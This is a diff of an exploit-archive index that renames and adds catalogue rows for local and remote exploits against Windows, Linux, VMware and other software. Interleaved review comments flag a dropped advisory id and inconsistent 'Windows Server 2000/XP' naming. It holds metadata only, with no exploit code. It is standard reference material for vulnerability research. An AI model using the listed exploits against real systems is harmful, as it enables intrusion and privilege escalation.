 35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Buffer Overflow (SEH)",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0
@@ -8251,10 +8257,10 @@ id,file,description,date,author,platform,type,port
 35901,platforms/windows/local/35901.txt,"VideoLAN VLC Media Player 2.1.5 - DEP Access Violation",2015-01-26,"Veysel HATAS",windows,local,0
 35902,platforms/windows/local/35902.txt,"VideoLAN VLC Media Player 2.1.5 - Write Access Violation",2015-01-26,"Veysel HATAS",windows,local,0
 35905,platforms/windows/local/35905.c,"Comodo Backup 4.4.0.0 - Null Pointer Dereference EOP",2015-01-26,"Parvez Anwar",windows,local,0
-35983,platforms/windows/local/35983.rb,"Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004)",2015-02-03,Metasploit,windows,local,0
+35983,platforms/windows/local/35983.rb,"Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) (Metasploit)",2015-02-03,Metasploit,windows,local,0
 35934,platforms/osx/local/35934.txt,"Apple Mac OSX < 10.10.x - GateKeeper Bypass",2015-01-29,"Amplia Security Research",osx,local,0
 35935,platforms/windows/local/35935.py,"UniPDF 1.1 - Crash PoC (SEH overwritten)",2015-01-29,bonze,windows,local,0
-35936,platforms/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Privilege Escalation",2015-01-29,KoreLogic,windows,local,0
+35936,platforms/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Privilege Escalation (MS14-070)",2015-01-29,KoreLogic,windows,local,0
 35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0
 35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0
 35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0
@@ -8272,13 +8278,13 @@ id,file,description,date,author,platform,type,port
 36296,platforms/bsd/local/36296.pl,"OpenPAM - 'pam_start()' Privilege Escalation",2011-11-09,IKCE,bsd,local,0
 36310,platforms/lin_x86-64/local/36310.txt,"Linux Kernel (x86-64) - Rowhammer Privilege Escalation (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local,0
 36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer - NaCl Sandbox Escape (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local,0
-36327,platforms/windows/local/36327.txt,"Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation",2011-11-22,instruder,windows,local,0
+36327,platforms/windows/local/36327.txt,"Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation (MS10-073)",2011-11-22,instruder,windows,local,0
 36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,local,0
 36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege",2015-03-16,LiquidWorm,windows,local,0
 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
 36424,platforms/windows/local/36424.txt,"Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0
 36430,platforms/linux/local/36430.sh,"HP Application Lifestyle Management 11 - 'GetInstalledPackages' Privilege Escalation",2011-12-08,anonymous,linux,local,0
-36437,platforms/windows/local/36437.rb,"Publish-It - '.PUI' Buffer Overflow (SEH)",2015-03-19,Metasploit,windows,local,0
+36437,platforms/windows/local/36437.rb,"Publish-It - '.PUI' Buffer Overflow (SEH) (Metasploit)",2015-03-19,Metasploit,windows,local,0
 36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0
 36476,platforms/windows/local/36476.txt,"Kaspersky Internet Security/Anti-Virus - '.cfg' File Memory Corruption",2011-12-21,"Vulnerability Research Laboratory",windows,local,0
 36501,platforms/windows/local/36501.py,"Mini-stream Ripper 2.7.7.100 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0
@@ -8329,12 +8335,12 @@ id,file,description,date,author,platform,type,port
 37292,platforms/linux/local/37292.c,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation",2015-06-16,rebel,linux,local,0
 37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0
 37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0
-37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit (Metasploit)",2015-06-24,Metasploit,windows,local,0
+37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit (MS15-051) (Metasploit)",2015-06-24,Metasploit,windows,local,0
 37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - Buffer Overflow (SEH)",2015-07-08,Vulnerability-Lab,windows,local,0
 40709,platforms/aix/local/40709.sh,"IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
 37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Function Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local,0
 37631,platforms/linux/local/37631.c,"GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0
-37657,platforms/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution",2015-07-20,"Eduardo Braun Prado",windows,local,0
+37657,platforms/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)",2015-07-20,"Eduardo Braun Prado",windows,local,0
 37670,platforms/osx/local/37670.sh,"Apple Mac OSX 10.10 - DYLD_PRINT_TO_FILE Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0
 37699,platforms/windows/local/37699.py,"Foxit Reader - '.png' Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0
 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,windows,local,0
@@ -8354,7 +8360,7 @@ id,file,description,date,author,platform,type,port
 37772,platforms/multiple/local/37772.js,"Mozilla Firefox < 39.03 - 'pdf.js' Same Origin Policy Exploit",2015-08-15,"Tantaryu MING",multiple,local,0
 37780,platforms/windows/local/37780.c,"ThinPrint - 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution",2012-09-04,"Moshe Zioni",windows,local,0
 37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor - (.qeditor) 4.0g- .qse SEH Based Buffer Overflow (ASLR & SAFESEH Bypass)",2015-08-17,St0rn,windows,local,0
-37813,platforms/windows/local/37813.rb,"VideoCharge Studio - Buffer Overflow (SEH)",2015-08-18,Metasploit,windows,local,0
+37813,platforms/windows/local/37813.rb,"VideoCharge Studio - Buffer Overflow (SEH) (Metasploit)",2015-08-18,Metasploit,windows,local,0
 37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure",2012-10-09,"Brad Spengler",linux,local,0
 37890,platforms/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Buffer Overflow",2015-08-20,metacom,windows,local,0
 37898,platforms/linux/local/37898.py,"Reaver Pro - Privilege Escalation",2012-09-30,infodox,linux,local,0
@@ -8374,14 +8380,14 @@ id,file,description,date,author,platform,type,port
 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0
 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0
 38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
-38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak",2015-09-15,"Google Security Research",windows,local,0
+38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0
 38200,platforms/windows/local/38200.txt,"Microsoft Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
 38201,platforms/windows/local/38201.txt,"Microsoft Windows - CreateObjectTask TileUserBroker Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
 38202,platforms/windows/local/38202.txt,"Microsoft Windows - CreateObjectTask SettingsSyncDiagnostics Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
 38218,platforms/windows/local/38218.py,"IKEView.exe R60 - '.elg' Local SEH Exploit",2015-09-17,cor3sm4sh3r,windows,local,0
 38219,platforms/windows/local/38219.py,"ZTE PC UI USB Modem Software - Buffer Overflow",2015-09-17,R-73eN,windows,local,0
 38220,platforms/windows/local/38220.py,"IKEView R60 - Buffer Overflow Local Exploit (SEH)",2015-09-17,VIKRAMADITYA,windows,local,0
-38222,platforms/win_x86-64/local/38222.rb,"Microsoft Windows - Font Driver Buffer Overflow (MS15-078)",2015-09-17,Metasploit,win_x86-64,local,0
+38222,platforms/win_x86-64/local/38222.rb,"Microsoft Windows - Font Driver Buffer Overflow (MS15-078) (Metasploit)",2015-09-17,Metasploit,win_x86-64,local,0
 38232,platforms/linux/local/38232.txt,"GNU Coreutils 'sort' Text Utility - Buffer Overflow",2013-01-21,anonymous,linux,local,0
 38243,platforms/windows/local/38243.py,"Total Commander 8.52 - Buffer Overflow (Windows 10)",2015-09-20,VIKRAMADITYA,windows,local,0
 38244,platforms/windows/local/38244.py,"Total Commander 8.52 - Buffer Overflow",2015-09-20,VIKRAMADITYA,windows,local,0
@@ -8465,6 +8471,7 @@ id,file,description,date,author,platform,type,port
 39310,platforms/windows/local/39310.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
 39311,platforms/windows/local/39311.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
 40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306
+40774,platforms/linux/local/40774.sh,"Nagios 4.2.2 - Privilege Escalation",2016-11-18,"Vincent Malguy",linux,local,0
 39340,platforms/android/local/39340.cpp,"Android - 'sensord' Privilege Escalation",2016-01-27,s0m3b0dy,android,local,0
 39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0
 39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0
@@ -8511,7 +8518,7 @@ id,file,description,date,author,platform,type,port
 39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",linux,local,0
 39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0
 39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,windows,local,0
-39791,platforms/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,Metasploit,multiple,local,0
+39791,platforms/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)",2016-05-09,Metasploit,multiple,local,0
 39803,platforms/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local,0
 39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0
 39809,platforms/windows/local/39809.cs,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
@@ -8541,12 +8548,12 @@ id,file,description,date,author,platform,type,port
 40039,platforms/win_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win_x86,local,0
 40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution",2016-06-29,Cr4sh,windows,local,0
 40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0
-40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset OOB Privilege Escalation",2016-07-03,vnik,linux,local,0
+40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,linux,local,0
 40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
 40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0
 40071,platforms/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
 40072,platforms/windows/local/40072.txt,"InstantHMI 6.1 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
-40107,platforms/windows/local/40107.rb,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
+40107,platforms/windows/local/40107.rb,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)",2016-07-13,Metasploit,windows,local,0
 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0
 40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
 40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Privilege Escalation (1)",2016-07-20,LiquidWorm,windows,local,0
@@ -8554,7 +8561,7 @@ id,file,description,date,author,platform,type,port
 40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0
 40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0
 40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0
-40169,platforms/linux/local/40169.txt,"VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0
+40169,platforms/linux/local/40169.txt,"VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation",2013-08-22,"Tavis Ormandy",linux,local,0
 40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - '.pls' Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0
 40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0
 40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
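Review bot: The new title for 40169 drops the vendor advisory id `(VMSA-2013-0010)`, which is the only reference in that row tying the entry to the vendor's fix. The other title edits in this commit go the opposite way and add bulletin ids such as `(MS16-032)`, so the removal looks inconsistent with the rest of the change. I would keep the suffix, i.e. `"VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)"`, so that anyone triaging by advisory id can still find the row. If the id is now tracked in another field, that is not visible in this file.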
@@ -8637,6 +8644,8 @@ id,file,description,date,author,platform,type,port
 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
+40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
+40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS root_reboot - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -8647,7 +8656,7 @@ id,file,description,date,author,platform,type,port
 18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Root Exploit",2003-04-23,truff,linux,remote,0
 19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Root Exploit",2003-04-25,blightninjas,linux,remote,1723
 20,platforms/windows/remote/20.txt,"Microsoft Windows - SMB Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139
-23,platforms/windows/remote/23.c,"RealServer < 8.0.2 - Remote Exploit (Windows Platforms)",2003-04-30,"Johnny Cyberpunk",windows,remote,554
+23,platforms/windows/remote/23.c,"RealServer < 8.0.2 (Windows Platforms) - Remote Exploit",2003-04-30,"Johnny Cyberpunk",windows,remote,554
 24,platforms/linux/remote/24.c,"Sendmail 8.12.8 - Prescan() BSD Remote Root Exploit",2003-04-30,bysin,linux,remote,25
 25,platforms/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0
 26,platforms/linux/remote/26.sh,"OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident",2003-05-02,"Nicolas Couture",linux,remote,0
@@ -8676,7 +8685,7 @@ id,file,description,date,author,platform,type,port
 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504
 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - Remote GID Root Exploit",2003-07-25,"the itch",linux,remote,1114
 64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135
-66,platforms/windows/remote/66.c,"Microsoft Windows 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135
+66,platforms/windows/remote/66.c,"Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135
 67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
 69,platforms/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (1)",2003-07-29,pHrail,windows,remote,135
 70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (2)",2003-07-30,anonymous,windows,remote,135
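Review bot: The new title for 66, `Microsoft Windows Server 2000/XP`, reads as a server product line, but XP has no Server edition, and the untouched row 117 in the hunk at -8709 still says `Microsoft Windows 2000/XP`. The index therefore ends up with two spellings for the same platform pair, which makes title-based matching against an asset inventory less reliable. The same rename is applied to 119 (hunk at -8709) and 295 (hunk at -8775). I would keep `Microsoft Windows 2000/XP` in all three rows, or rename every such row in one pass so the naming stays consistent.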
@@ -8709,7 +8718,7 @@ id,file,description,date,author,platform,type,port
 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0
 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515
 117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (Non Exec Memory) Exploit",2003-11-07,ins1der,windows,remote,135
-119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0
+119,platforms/windows/remote/119.c,"Microsoft Windows Server 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0
 121,platforms/windows/remote/121.c,"Microsoft FrontPage Server Extensions - 'fp30reg.dll' Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80
 123,platforms/windows/remote/123.c,"Microsoft Windows - Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0
 124,platforms/windows/remote/124.pl,"IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80
@@ -8775,7 +8784,7 @@ id,file,description,date,author,platform,type,port
 291,platforms/linux/remote/291.c,"TCP Connection Reset - Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0
 293,platforms/windows/remote/293.c,"Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445
 294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - (connectedNodes.ovpl) Remote Root Exploit",2004-04-28,FX,hardware,remote,8000
-295,platforms/windows/remote/295.c,"Microsoft Windows 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445
+295,platforms/windows/remote/295.c,"Microsoft Windows Server 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445
 296,platforms/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow",2004-05-05,vade79,linux,remote,0
 297,platforms/windows/remote/297.c,"Sasser Worm ftpd - Remote Buffer Overflow (port 5554)",2004-05-16,mandragore,windows,remote,5554
 300,platforms/multiple/remote/300.c,"CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow Root Exploit",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401
@@ -8933,7 +8942,7 @@ id,file,description,date,author,platform,type,port
 902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Root Exploit",2005-03-29,darkeagle,linux,remote,21
 903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - (imapmagicplus) Remote Exploit",2005-03-29,crash-x,linux,remote,143
 906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,windows,remote,20031
-909,platforms/windows/remote/909.cpp,"Microsoft Windows - 'WINS' Remote Buffer Overflow (3)",2005-04-12,class101,windows,remote,42
+909,platforms/windows/remote/909.cpp,"Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)",2005-04-12,class101,windows,remote,42
 915,platforms/linux/remote/915.c,"MailEnable Enterprise 1.x - Imapd Remote Exploit",2005-04-05,Expanders,linux,remote,143
 930,platforms/windows/remote/930.html,"Microsoft Internet Explorer - DHTML Object Memory Corruption",2005-04-12,Skylined,windows,remote,0
 934,platforms/linux/remote/934.c,"gld 1.4 - (Postfix Greylisting Daemon) Remote Format String",2005-04-13,Xpl017Elz,linux,remote,2525
@@ -8968,7 +8977,7 @@ id,file,description,date,author,platform,type,port
 1047,platforms/linux/remote/1047.pl,"ViRobot Advanced Server 2.0 - (addschup) Remote Cookie Exploit",2005-06-14,"Kevin Finisterre",linux,remote,8080
 1055,platforms/linux/remote/1055.c,"PeerCast 0.1211 - Remote Format String",2005-06-20,darkeagle,linux,remote,7144
 1066,platforms/windows/remote/1066.cpp,"Microsoft Outlook Express - NNTP Buffer Overflow (MS05-030)",2005-06-24,eyas,windows,remote,0
-1075,platforms/windows/remote/1075.c,"Microsoft Windows Message - Queuing Buffer Overflow Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103
+1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing - Buffer Overflow Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103
 1079,platforms/windows/remote/1079.html,"Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Exploit",2005-07-05,k-otik,windows,remote,0
 1081,platforms/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client Exploit",2005-07-03,"Kevin Finisterre",hardware,remote,0
 1089,platforms/windows/remote/1089.c,"Mozilla FireFox 1.0.1 - Remote GIF Heap Overflow",2005-07-05,darkeagle,windows,remote,0
@@ -8996,8 +9005,8 @@ id,file,description,date,author,platform,type,port
 1167,platforms/solaris/remote/1167.pm,"Solaris 10 LPD - Arbitrary File Delete Exploit (Metasploit)",2005-08-19,Optyx,solaris,remote,0
 1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 - (Expires Header) Remote Buffer Overflow",2005-08-22,c0ntex,linux,remote,0
 1178,platforms/windows/remote/1178.c,"Microsoft IIS 5.0 - (500-100.asp) Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0
-1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish)",2005-08-25,RoMaNSoFt,windows,remote,445
-1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French)",2005-08-25,"Fabrice Mourron",windows,remote,445
+1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish) (MS05-039)",2005-08-25,RoMaNSoFt,windows,remote,445
+1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French) (MS05-039)",2005-08-25,"Fabrice Mourron",windows,remote,445
 1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/Denial of Service",2005-08-29,"Luigi Auriemma",windows,remote,0
 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow (2)",2005-08-30,basher13,windows,remote,80
 1188,platforms/multiple/remote/1188.c,"HP OpenView Network Node Manager 7.50 - Remote Exploit",2005-08-30,Lympex,multiple,remote,0
@@ -9120,8 +9129,8 @@ id,file,description,date,author,platform,type,port
 2054,platforms/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0
 2061,platforms/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 - Remote Directory Listing",2006-07-23,"ScanAlert Security",multiple,remote,0
 2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi - (CSeq) Remote Buffer Overflow",2006-07-24,"Jacopo Cervini",windows,remote,5060
-2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager - Remote Buffer Overflow (1) (Metasploit)",2006-07-26,ri0t,windows,remote,10616
-2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow (2) (Metasploit)",2006-07-26,ri0t,windows,remote,0
+2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)",2006-07-26,ri0t,windows,remote,10616
+2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)",2006-07-26,ri0t,windows,remote,0
 2076,platforms/windows/remote/2076.pl,"AIM Triton 1.0.4 - (SipXtapi) Remote Buffer Overflow (PoC)",2006-07-26,c0rrupt,windows,remote,5061
 2079,platforms/windows/remote/2079.pl,"eIQnetworks ESA - (Syslog Server) Remote Buffer Overflow",2006-07-27,"Kevin Finisterre",windows,remote,12345
 2080,platforms/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)",2006-07-27,"Kevin Finisterre",windows,remote,10616
@@ -9144,7 +9153,7 @@ id,file,description,date,author,platform,type,port
